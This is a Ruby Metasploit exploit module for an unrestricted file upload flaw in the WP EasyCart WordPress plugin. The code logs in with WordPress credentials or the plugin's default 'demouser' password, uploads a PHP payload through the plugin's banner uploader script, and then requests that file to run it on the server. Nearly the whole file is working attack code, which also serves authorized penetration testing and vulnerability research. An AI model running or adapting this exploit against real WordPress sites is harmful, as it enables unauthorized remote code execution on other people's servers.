##
# This module requires Metasploit: http://www.metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::FileDropper
include Msf::HTTP::Wordpress
def initialize(info = {})
super(update_info(
info,
'Name' => 'WordPress WP EasyCart Unrestricted File Upload',
'Description' => %q{WordPress Shopping Cart (WP EasyCart) Plugin for
WordPress contains a flaw that allows a remote
attacker to execute arbitrary PHP code. This
flaw exists because the
/inc/amfphp/administration/banneruploaderscript.php
script does not properly verify or sanitize
user-uploaded files. By uploading a .php file,
the remote system will place the file in a
user-accessible path. Making a direct request to
the uploaded file will allow the attacker to
execute the script with the privileges of the web
server.
In versions <= 3.0.8 authentication can be done by
using the WordPress credentials of a user with any
role. In later versions, a valid EasyCart admin
password will be required that is in use by any
admin user. A default installation of EasyCart will
setup a user called "demouser" with a preset password
of "demouser".},
'License' => MSF_LICENSE,
'Author' =>
[
'Kacper Szurek', # Vulnerability disclosure
'Rob Carr <rob[at]rastating.com>' # Metasploit module
],
'References' =>
[
['OSVDB', '116806'],
['WPVDB', '7745']
],
'DisclosureDate' => 'Jan 08 2015',
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [['wp-easycart', {}]],
'DefaultTarget' => 0
))
register_options(
[
OptString.new('USERNAME', [false, 'The WordPress username to authenticate with (versions <= 3.0.8)']),
OptString.new('PASSWORD', [false, 'The WordPress password to authenticate with (versions <= 3.0.8)']),
OptString.new('EC_PASSWORD', [false, 'The EasyCart password to authenticate with (versions <= 3.0.18)', 'demouser']),
OptBool.new('EC_PASSWORD_IS_HASH', [false, 'Indicates whether or not EC_PASSWORD is an MD5 hash', false])
], self.class)
end
def username
datastore['USERNAME']
end
def password
datastore['PASSWORD']
end
def ec_password
datastore['EC_PASSWORD']
end
def ec_password_is_hash
datastore['EC_PASSWORD_IS_HASH']
end
def use_wordpress_authentication
username.to_s != '' && password.to_s != ''
end
def use_ec_authentication
ec_password.to_s != ''
end
def req_id
if ec_password_is_hash
return ec_password
else
return Rex::Text.md5(ec_password)
end
end
def generate_mime_message(payload, date_hash, name, include_req_id)
data = Rex::MIME::Message.new
data.add_part(date_hash, nil, nil, 'form-data; name="datemd5"')
data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"Filedata\"; filename=\"#{name}\"")
data.add_part(req_id, nil, nil, 'form-data; name="reqID"') if include_req_id
data
end
def setup
if !use_wordpress_authentication && !use_ec_authentication
fail_with(Failure::BadConfig, 'You must set either the USERNAME and PASSWORD options or specify an EC_PASSWORD value')
end
super
end
def exploit
vprint_status("#{peer} - WordPress authentication attack is enabled") if use_wordpress_authentication
vprint_status("#{peer} - EC authentication attack is enabled") if use_ec_authentication
if use_wordpress_authentication && use_ec_authentication
print_status("#{peer} - Both EasyCart and WordPress credentials were supplied, attempting WordPress first...")
end
if use_wordpress_authentication
print_status("#{peer} - Authenticating using #{username}:#{password}...")
cookie = wordpress_login(username, password)
if !cookie
if use_ec_authentication
print_warning("#{peer} - Failed to authenticate with WordPress, attempting upload with EC password next...")
else
fail_with(Failure::NoAccess, 'Failed to authenticate with WordPress')
end
else
print_good("#{peer} - Authenticated with WordPress")
end
end
print_status("#{peer} - Preparing payload...")
payload_name = Rex::Text.rand_text_alpha(10)
date_hash = Rex::Text.md5(Time.now.to_s)
uploaded_filename = "#{payload_name}_#{date_hash}.php"
plugin_url = normalize_uri(wordpress_url_plugins, 'wp-easycart')
uploader_url = normalize_uri(plugin_url, 'inc', 'amfphp', 'administration', 'banneruploaderscript.php')
payload_url = normalize_uri(plugin_url, 'products', 'banners', uploaded_filename)
data = generate_mime_message(payload, date_hash, "#{payload_name}.php", use_ec_authentication)
print_status("#{peer} - Uploading payload to #{payload_url}")
res = send_request_cgi(
'method' => 'POST',
'uri' => uploader_url,
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => data.to_s,
'cookie' => cookie
)
fail_with(Failure::Unreachable, 'No response from the target') if res.nil?
vprint_error("#{peer} - Server responded with status code #{res.code}") if res.code != 200
print_status("#{peer} - Executing the payload...")
register_files_for_cleanup(uploaded_filename)
res = send_request_cgi(
{
'uri' => payload_url,
'method' => 'GET'
}, 5)
if !res.nil? && res.code == 404
print_error("#{peer} - Failed to upload the payload")
else
print_good("#{peer} - Executed payload")
end
end
endData
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